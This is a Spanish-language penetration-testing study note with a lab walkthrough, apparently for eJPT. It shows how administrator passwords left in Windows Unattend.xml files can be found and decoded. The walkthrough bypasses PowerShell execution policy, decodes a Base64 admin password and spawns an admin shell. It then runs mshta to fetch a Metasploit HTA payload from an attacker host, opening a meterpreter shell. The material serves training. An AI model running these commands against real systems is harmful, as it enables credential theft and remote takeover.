> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/ataques-basados-en-sistema-host/windows/volcado-de-credenciales-de-windows/busqueda-de-contrasenas-en-archivos-de-configuracion-de-windows.md).

# Búsqueda de contraseñas en archivos de configuración de Windows

## 🪟 Archivos de configuración de Windows

* **Windows** permite automatizar una variedad de tareas repetitivas, como la instalación masiva del sistema operativo en múltiples máquinas.
* Esta automatización se realiza normalmente mediante la utilidad **Unattended Windows Setup**, que permite desplegar instalaciones de Windows sin intervención del usuario.
* Dicha herramienta utiliza **archivos de configuración** que incluyen parámetros específicos del sistema y, en muchos casos, **credenciales de cuentas de usuario**, como la contraseña del usuario **Administrador**.
* Si estos archivos de configuración permanecen en el sistema tras la instalación, pueden ser **utilizados por un atacante** para obtener credenciales válidas y autenticarse legítimamente en el sistema.

***

## 📁 Configuración desatendida de Windows

* Esta utilidad suele apoyarse en alguno de los siguientes archivos para definir la configuración del sistema y las cuentas:

```
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Autounattend.xml
```

* Como medida de seguridad, las contraseñas almacenadas en estos archivos pueden encontrarse **codificadas en Base64**, lo cual no es una forma de cifrado real, sino simplemente una codificación reversible.

***

## 🧪Laboratorio Práctico

**Paso 1:** Cambiar a la máquina atacante para localizar una vulnerabilidad de escalada de privilegios.

<figure><img src="/files/6ItOI3O7jU61Y1txxuSo" alt=""><figcaption></figcaption></figure>

**Paso 2:** Abra la terminal powershell.exe para verificar el usuario actual.

<figure><img src="/files/igzAjYaRzCF3ht6PkHzn" alt=""><figcaption></figcaption></figure>

Trabajamos como estudiantes. Se proporcionan el framework PowerSploit y los scripts Powerup.ps1.

**Paso 3:** Ejecutaremos el script de PowerShell powerup.ps1 para encontrar la vulnerabilidad de escalada de privilegios.

**Comandos:**

```
cd .\Desktop\PowerSploit\Privesc\
ls
```

<figure><img src="/files/OJ6173XamUVNllyLgJhm" alt=""><figcaption></figcaption></figure>

**Paso 4:** Importe el script PowerUp.ps1 y la función Invoke-PrivescAudit.

**Comandos:**

```
powershell -ep bypass (PowerShell execution policy bypass)
. .\PowerUp.ps1
Invoke-PrivescAudit
```

<figure><img src="/files/I481JFTy2TyRH0KPLavC" alt=""><figcaption></figcaption></figure>

Observamos que hay un archivo **Unattend.xml** en el sistema. **Ábralo** .

**Unattend.xml:** Unattend.xml es un archivo de respuesta para la instalación. Los archivos pueden contener credenciales codificadas o en texto plano, así como otra información confidencial.

**Paso 5:** Lectura del archivo Unattend.xml.

**Dominio:**

```
cat C:\Windows\Panther\Unattend.xml
```

<figure><img src="/files/uAwO3Vn6uqLs5mUAiHQ2" alt=""><figcaption></figcaption></figure>

Hemos descubierto una contraseña codificada de administrador, es decir, **“QWRtaW5AMTIz”** .

**Paso 6:** Decodificación de la contraseña de administrador mediante Powershell.

**Comandos:**

```
$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($pa
ssword))
echo $password
```

<figure><img src="/files/akzaJh897iEOpm0q0buO" alt=""><figcaption></figcaption></figure>

La contraseña del administrador es **“Admin\@123”** .

**Paso 7:** Ejecutamos un símbolo del sistema como usuario administrador usando credenciales de detección.

**Comandos:**

```
runas.exe /user:administrator cmd
Admin@123
whoami
```

<figure><img src="/files/bfx2aYmMDXMaRqXqMJD0" alt=""><figcaption></figcaption></figure>

Estamos ejecutando cmd.exe como administrador.

**Cambie a la máquina Kali** .

**Paso 8:** Ejecute el módulo **hta\_server** para acceder al shell de meterpreter. Inicie msfconsole.

**Comandos:**

```
msfconsole -q
use exploit/windows/misc/hta_server
exploit
```

“Este módulo aloja una aplicación HTML (HTA) que, al abrirse, ejecutará una carga útil a través de PowerShell”.

<figure><img src="/files/huQh0UmUyaRy2kposIL5" alt=""><figcaption></figcaption></figure>

Copie la carga útil generada, es decir, **“<http://10.10.31.2:8080/Bn75U0NL8ONS.hta”>** y ejecútela en cmd.exe con el comando mshta para obtener el shell de meterpreter.

**Cambiar a la máquina de destino.**

**Paso 9:** Obtener una carcasa de meterpreter.

**Dominio:**

```
mshta.exe http://10.10.31.2:8080/Bn75U0NL8ONS.hta
```

**Nota:** Debes utilizar tu propio enlace de servidor HTA de metasploit.

<figure><img src="/files/YWNiE1by9dH6zn8woyV3" alt=""><figcaption></figcaption></figure>

Podemos esperar una shell de meterpreter.

**Paso 10:** Encuentra la bandera.

**Comandos:**

```
sessions -i 1
cd /
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt
```

<figure><img src="/files/QZ7ofpb0dO8LZ14m9XxQ" alt=""><figcaption></figcaption></figure>

Esto nos revela la bandera.

**Bandera:** 097ab83639dce0ab3429cb0349493f60

#### Conclusión

En este laboratorio, explotamos una falla común de escalada de privilegios de Windows y obtuvimos una sesión de meterpreter con altos privilegios.

#### Referencias

* [Archivos de respuestas (unattend.xml)](https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/update-windows-settings-and-scripts-create-your-own-answer-file-sxs)
* [Metasploit](https://www.metasploit.com/)
* [Servidor web HTA](https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server)
